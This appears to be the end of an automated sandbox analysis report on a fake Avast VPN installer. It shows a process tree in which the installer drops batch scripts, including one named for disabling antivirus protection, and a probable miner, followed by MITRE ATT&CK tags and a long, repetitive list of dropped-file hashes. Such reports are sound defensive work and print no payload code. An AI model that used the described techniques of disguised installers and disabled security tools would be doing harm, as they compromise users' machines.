                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:460
                                                                                                                                                            • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                              "SgrmClientApi.exe"
                                                                                                                                                              8⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1600
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 184
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:1496
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c ""C:\ProgramData\xOUvu\DiskRemoval.bat" "
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1988
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /T 60 /NOBREAK
                                                                                                                                                            7⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:1660
                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe "795909737950359847-12024671957094539991330680422-1605709111-17737191331694663699"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1404
                                                                                                                                              • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                wmiadap.exe /F /T /R
                                                                                                                                                1⤵
                                                                                                                                                  PID:556

                                                                                                                                                Network

                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                Persistence

                                                                                                                                                Modify Existing Service

                                                                                                                                                2
                                                                                                                                                T1031

                                                                                                                                                Bootkit

                                                                                                                                                1
                                                                                                                                                T1067

                                                                                                                                                Defense Evasion

                                                                                                                                                Modify Registry

                                                                                                                                                3
                                                                                                                                                T1112

                                                                                                                                                Disabling Security Tools

                                                                                                                                                1
                                                                                                                                                T1089

                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                1
                                                                                                                                                T1497

                                                                                                                                                Install Root Certificate

                                                                                                                                                1
                                                                                                                                                T1130

                                                                                                                                                Discovery

                                                                                                                                                Query Registry

                                                                                                                                                3
                                                                                                                                                T1012

                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                1
                                                                                                                                                T1497

                                                                                                                                                System Information Discovery

                                                                                                                                                4
                                                                                                                                                T1082

                                                                                                                                                Replay Monitor

                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                Downloads

                                                                                                                                                • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                                  MD5

                                                                                                                                                  97a2db945a42346cdae06304a03250a8

                                                                                                                                                  SHA1

                                                                                                                                                  2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                                  SHA256

                                                                                                                                                  1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                                  SHA512

                                                                                                                                                  3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                                • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                                  MD5

                                                                                                                                                  97a2db945a42346cdae06304a03250a8

                                                                                                                                                  SHA1

                                                                                                                                                  2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                                  SHA256

                                                                                                                                                  1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                                  SHA512

                                                                                                                                                  3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                                • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                                  MD5

                                                                                                                                                  6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                                  SHA1

                                                                                                                                                  e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                                  SHA256

                                                                                                                                                  4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                                  SHA512

                                                                                                                                                  e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                                • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                                  MD5

                                                                                                                                                  6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                                  SHA1

                                                                                                                                                  e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                                  SHA256

                                                                                                                                                  4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                                  SHA512

                                                                                                                                                  e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                  MD5

                                                                                                                                                  72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                  SHA1

                                                                                                                                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                  SHA256

                                                                                                                                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                  SHA512

                                                                                                                                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\44xUGQ\DisableOAVProtection.bat
                                                                                                                                                  MD5

                                                                                                                                                  c97c64f53865b9da2a642d36b02df043

                                                                                                                                                  SHA1

                                                                                                                                                  181ca1deb68409feae2e70ebf347b3111218a47a

                                                                                                                                                  SHA256

                                                                                                                                                  1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                                                                                                  SHA512

                                                                                                                                                  05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                                                                                                • C:\ProgramData\44xUGQ\DiskRemoval.bat
                                                                                                                                                  MD5

                                                                                                                                                  0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                                  SHA1

                                                                                                                                                  85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                                  SHA256

                                                                                                                                                  1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                                  SHA512

                                                                                                                                                  137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                                • C:\ProgramData\44xUGQ\MMF.vbs
                                                                                                                                                  MD5

                                                                                                                                                  fa6dcfa398aff28ba12687272732eb51

                                                                                                                                                  SHA1

                                                                                                                                                  f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                                                                                                  SHA256

                                                                                                                                                  f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                                                                                                  SHA512

                                                                                                                                                  9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\ANTIAV~1.DAT
                                                                                                                                                  MD5

                                                                                                                                                  6ae087a296b165bae13b087e9aa8ab8c

                                                                                                                                                  SHA1

                                                                                                                                                  43619b9719a61513cefe18d76d17906689e806d4

                                                                                                                                                  SHA256

                                                                                                                                                  56568ed22c5ff3f471df0e49d68fe7d7af5803c7f84157b2b4e6d8765ced63c5

                                                                                                                                                  SHA512

                                                                                                                                                  0cb2950913aa422663b5d26deef87f1ea883dfc62efa34456745be2f64358bc6d1e581728dea525e28d02bc862dd86ba281cc6bdc32c4ac87406422faca6fffb

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_1.zip
                                                                                                                                                  MD5

                                                                                                                                                  6630fc74d94c8fae1886723dfd2d310e

                                                                                                                                                  SHA1

                                                                                                                                                  d480318a9b007ede1c07339893d5009316eb0cef

                                                                                                                                                  SHA256

                                                                                                                                                  5e795ec7711999534d66d69683412a2c9ae8560337463478c99a02fee4ea140b

                                                                                                                                                  SHA512

                                                                                                                                                  66651cab7583f9bdddfe2693cffca669e40ee39b2a67251e838acc0bb4a97b1b4a0759b5811eed304962668d92d91eac099a8c9fbba4e3af2bf383f9eb748495

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_10.zip
                                                                                                                                                  MD5

                                                                                                                                                  c9621d7aeec97d82dbd4adcf9cb9f2a0

                                                                                                                                                  SHA1

                                                                                                                                                  08f98568356f1e8b87df6e5ce36b5f9321a95770

                                                                                                                                                  SHA256

                                                                                                                                                  a8eb43eb99f7bee2d2a604b3607bb2cdbf75d91e9def8e2abf1fae64888405b8

                                                                                                                                                  SHA512

                                                                                                                                                  13101ccec6003c71eba95ec5e0cef0047c6172e0abeeaee63239bb8f4d1512735ea660570c3342908b0a8d95bb895900f024a80c07bfef79e12092724cc0600b

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_2.zip
                                                                                                                                                  MD5

                                                                                                                                                  e09e9b63cabcff376ffe88c218ef96e1

                                                                                                                                                  SHA1

                                                                                                                                                  591be3b952122ee767552913cfe8e039725d41ab

                                                                                                                                                  SHA256

                                                                                                                                                  e45ce86ef9edb87e353b68b2c1c3da4a95eacb3a0084ad22197575670c1796b9

                                                                                                                                                  SHA512

                                                                                                                                                  c76ff7017c2c960b86b522f6453c06eeb00c2e59355f9b697494fe7ae68e78a08dd08484c644689d8486d285f11988fe9902de36b21309a71c69c745e581f5ac

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_3.zip
                                                                                                                                                  MD5

                                                                                                                                                  973a9c24b85b7b603e169c2be816c203

                                                                                                                                                  SHA1

                                                                                                                                                  6d37530f928e8417f6e29b8b31043d28343f824b

                                                                                                                                                  SHA256

                                                                                                                                                  bb1a51b1d618daac22fee03d58af0d1db3483499a1bffc9b64c8bc6db0b811c8

                                                                                                                                                  SHA512

                                                                                                                                                  bcfbea3f684d43c96c50682d1b7f4ab8c9c57e07a73a158e59829626fa328c62d0ae39760d1ca4ab8444a28feeb48158a066502f624e1fe42653b9f867211536

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_4.zip
                                                                                                                                                  MD5

                                                                                                                                                  f4ada91b2de48b7d9a826c30cd3fe058

                                                                                                                                                  SHA1

                                                                                                                                                  0bb9e83f7164931f622411006eb282f66ff52114

                                                                                                                                                  SHA256

                                                                                                                                                  7613813172087843788a20db8708a75a55b80a43df61f06f3c59529976d4c137

                                                                                                                                                  SHA512

                                                                                                                                                  cc3f92a91d72bfda0a3d9ee8a85d22b03c44b2439d6c401360e296bd35b25b9bbf6d3f37252bd663b049284b3cd1296ca051ed4eb344d4c07271fa2d45c9d045

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_5.zip
                                                                                                                                                  MD5

                                                                                                                                                  84e9eac637ec6950039d1fdc2fc98fdf

                                                                                                                                                  SHA1

                                                                                                                                                  e5948ad422c003fe464fcbd04bbbc19e0893b906

                                                                                                                                                  SHA256

                                                                                                                                                  d974a03ccc0a97d6bdc985d1383eeb49265793b7ab0706e62a52fc9396f9c077

                                                                                                                                                  SHA512

                                                                                                                                                  bc01d677f1bad7056cafd5efc96eed2cdd73169b4ad95ba334244173d0445819cf1c1434d4f7d60fd32d89daddeece370344aec96922d0f52f37d33c74e87fa1

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_6.zip
                                                                                                                                                  MD5

                                                                                                                                                  2418a98fd773eee01057511540eb503e

                                                                                                                                                  SHA1

                                                                                                                                                  90374be4cf2b7d2cf4bae06ee7664bce271379f9

                                                                                                                                                  SHA256

                                                                                                                                                  d249d2de0c7aa60abf46dbc9025f259da762fd5ee14fb192942805a191340798

                                                                                                                                                  SHA512

                                                                                                                                                  abf5748b4a39b7a540e5de1b92ddeeeeb698d11f13d9d41ed90c1286a44af7f5e637a1be09859bb4494e2c4e36292ede0b9d89b2d88d2b6889f7ee534044b719

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_7.zip
                                                                                                                                                  MD5

                                                                                                                                                  87dd546a5202ccfac25fdaa310df2505

                                                                                                                                                  SHA1

                                                                                                                                                  41c2989ab152f5c27e19134a48cd94760e2c5128

                                                                                                                                                  SHA256

                                                                                                                                                  d2a2c66fe17ecde6d7833876b985f1a9bb70064bb25431b9b319eff947cb94e5

                                                                                                                                                  SHA512

                                                                                                                                                  747601f8c1ce5f8163c3f8c34acdc9598e20d5d0b0a58b138c14b9b0d85c077e1c5e8c6b98d42ef9748e83f9a5e5e234050e59f454a61872dc230be3c0e636d2

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_8.zip
                                                                                                                                                  MD5

                                                                                                                                                  134f19e66fa1fa01428497383608233a

                                                                                                                                                  SHA1

                                                                                                                                                  45597296b80d63bbe6e81d1897dde6dc2dd2a67e

                                                                                                                                                  SHA256

                                                                                                                                                  dfa3d77cddde79cb7edb58ef8a6bfd3fa5c44b24d80ccbf951a3e72fa220f25d

                                                                                                                                                  SHA512

                                                                                                                                                  53e51b70664b0d512c2962d9c02873a42298312707bc9bfc6771dd3b7103c0fb5045983d3094b9d876a049534383fc45de9973b4f515abdc935c029682789949

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\file_9.zip
                                                                                                                                                  MD5

                                                                                                                                                  6668a5dc7e2c1eee0faa3b68efe5bce1

                                                                                                                                                  SHA1

                                                                                                                                                  1c111148d207bcc057e1e6644baf7b03fb4a8511

                                                                                                                                                  SHA256

                                                                                                                                                  004e649c2824f5e6e443e5fd9c576b8d010019f5d2b8eff7b770f3b77553ecc8

                                                                                                                                                  SHA512

                                                                                                                                                  31e078c95eae1cba13479667316bb3577211a996edb5a791269c2164a8ec60064147fa560f89051956a89749e18dc9d070cff3e92d484616cbe0331f347d27ea

                                                                                                                                                • C:\ProgramData\44xUGQ\extracted\xmhost.exe
                                                                                                                                                  MD5

                                                                                                                                                  98ddca23b8741bb9e1e3506a037415e7

                                                                                                                                                  SHA1

                                                                                                                                                  e15026506c80137bda2780244544d170d7e019cc

                                                                                                                                                  SHA256

                                                                                                                                                  68bcaf3ea13f3f7f1ad492ab7f4321a402320fb51b5d43ab5bb8bdc45a3bcbf2

                                                                                                                                                  SHA512

                                                                                                                                                  c5943338e338aefec30ad62abf7fe23b6ff9dcca479a38c12a04bbe55c3f330d81b3317f165fe8430ffad84e9a57e3252a2a175b2779e043522ec98110065697

                                                                                                                                                • C:\ProgramData\44xUGQ\file.bin
                                                                                                                                                  MD5

                                                                                                                                                  2f58c923ea1cc3fd520932811682c408

                                                                                                                                                  SHA1

                                                                                                                                                  7414e6b91aa33f8a8b9dc28ac00520cefc43333e

                                                                                                                                                  SHA256

                                                                                                                                                  30a6276dc8d76a70152dc7b1b4c115055a4b27977ce8f43309b7625ddf0d362a

                                                                                                                                                  SHA512

                                                                                                                                                  874ea3c30fbeaea0872a2b518f0ae44226540177e19ddc6aa3b63e6f859b057c5d7a66d3a1d5085b94107f642d5aaf0c51e5e724540b69476018d205fa169baf

                                                                                                                                                • C:\ProgramData\44xUGQ\main.bat
                                                                                                                                                  MD5

                                                                                                                                                  1b7aeae05fee98007132f96fcde9206d

                                                                                                                                                  SHA1

                                                                                                                                                  c1e2b0b73b58d2f6b777db0adfc116477c7b1e45

                                                                                                                                                  SHA256

                                                                                                                                                  2478f9543b83d04e8ac7fceeb7ea7e62e4f2a69407ab7120b1e4f002e73d38ba

                                                                                                                                                  SHA512

                                                                                                                                                  071866ce1a7d20e0206b4b423ba19d7709da73a6829567c68be5bbb379ecfc5f8e129fd361da02945909f4ad848622add19ce3fc6761d8ee87acce6985f07903

                                                                                                                                                • C:\ProgramData\44xUGQ\xmhost.exe
                                                                                                                                                  MD5

                                                                                                                                                  98ddca23b8741bb9e1e3506a037415e7

                                                                                                                                                  SHA1

                                                                                                                                                  e15026506c80137bda2780244544d170d7e019cc

                                                                                                                                                  SHA256

                                                                                                                                                  68bcaf3ea13f3f7f1ad492ab7f4321a402320fb51b5d43ab5bb8bdc45a3bcbf2

                                                                                                                                                  SHA512

                                                                                                                                                  c5943338e338aefec30ad62abf7fe23b6ff9dcca479a38c12a04bbe55c3f330d81b3317f165fe8430ffad84e9a57e3252a2a175b2779e043522ec98110065697

                                                                                                                                                • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                  MD5

                                                                                                                                                  72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                  SHA1

                                                                                                                                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                  SHA256

                                                                                                                                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                  SHA512

                                                                                                                                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                                • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                  MD5

                                                                                                                                                  619f7135621b50fd1900ff24aade1524

                                                                                                                                                  SHA1

                                                                                                                                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                  SHA256

                                                                                                                                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                  SHA512

                                                                                                                                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                                • C:\ProgramData\xOUvu\DisableOAVProtection.bat
                                                                                                                                                  MD5

                                                                                                                                                  ed77c2b2866fc09850a317f2620f4f9c

                                                                                                                                                  SHA1

                                                                                                                                                  ed1d7485a1111bd553ffe81927260652718a1c39

                                                                                                                                                  SHA256

                                                                                                                                                  763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

                                                                                                                                                  SHA512

                                                                                                                                                  4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

                                                                                                                                                • C:\ProgramData\xOUvu\DiskRemoval.bat
                                                                                                                                                  MD5

                                                                                                                                                  0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                                  SHA1

                                                                                                                                                  85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                                  SHA256

                                                                                                                                                  1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                                  SHA512

                                                                                                                                                  137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                                • C:\ProgramData\xOUvu\MMF.vbs
                                                                                                                                                  MD5

                                                                                                                                                  62c210400fef1cb41efa4c8b2c963964

                                                                                                                                                  SHA1

                                                                                                                                                  fa471dcf721b5f61a8794a75e3a9226e79b3ec80

                                                                                                                                                  SHA256

                                                                                                                                                  ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

                                                                                                                                                  SHA512

                                                                                                                                                  64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

                                                                                                                                                • C:\ProgramData\xOUvu\file.bin
                                                                                                                                                  MD5

                                                                                                                                                  897c2da4873706af1dd7e95204b8f82c

                                                                                                                                                  SHA1

                                                                                                                                                  36ef68962c416f3f627d04fdd6a784c4e9b4df37

                                                                                                                                                  SHA256

                                                                                                                                                  575e2af2e82f7a31e6a2dd0968acbb30d190da22e7935fe718e725cc95843123

                                                                                                                                                  SHA512

                                                                                                                                                  ae74bb521ddfe33d12c58448daf8191fa05828bf72ae85b226ed99f6ca5c6418d8f87d10532b8bbee8686a3967eef53b1b8565b5278018f40ab273b91dc621ec

                                                                                                                                                • C:\ProgramData\xOUvu\main.bat
                                                                                                                                                  MD5

                                                                                                                                                  87d5210ddd66fe8843cd702ee78b1933

                                                                                                                                                  SHA1

                                                                                                                                                  f6faf81c8cae28f42ee7e120cf80cba42640e13e

                                                                                                                                                  SHA256

                                                                                                                                                  b41cfe7095479b54da9913d28fff26a0f5ec916aba826ccd8effb616d9d58a58

                                                                                                                                                  SHA512

                                                                                                                                                  5c2169c8487f60bfa10dc17d9fd93e2105ea1e7f0d1a22fd8207bd9dd814af6af934206cfe24f6f4ab77324468a9e63796588f52fd78246279c42347bd82f766

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-L7K4H.tmp\avastvpn.tmp
                                                                                                                                                  MD5

                                                                                                                                                  78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                                  SHA1

                                                                                                                                                  57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                                  SHA256

                                                                                                                                                  92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                                  SHA512

                                                                                                                                                  1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-OHOET.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp
                                                                                                                                                  MD5

                                                                                                                                                  78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                                  SHA1

                                                                                                                                                  57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                                  SHA256

                                                                                                                                                  92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                                  SHA512

                                                                                                                                                  1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                                • \Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                                  MD5

                                                                                                                                                  97a2db945a42346cdae06304a03250a8

                                                                                                                                                  SHA1

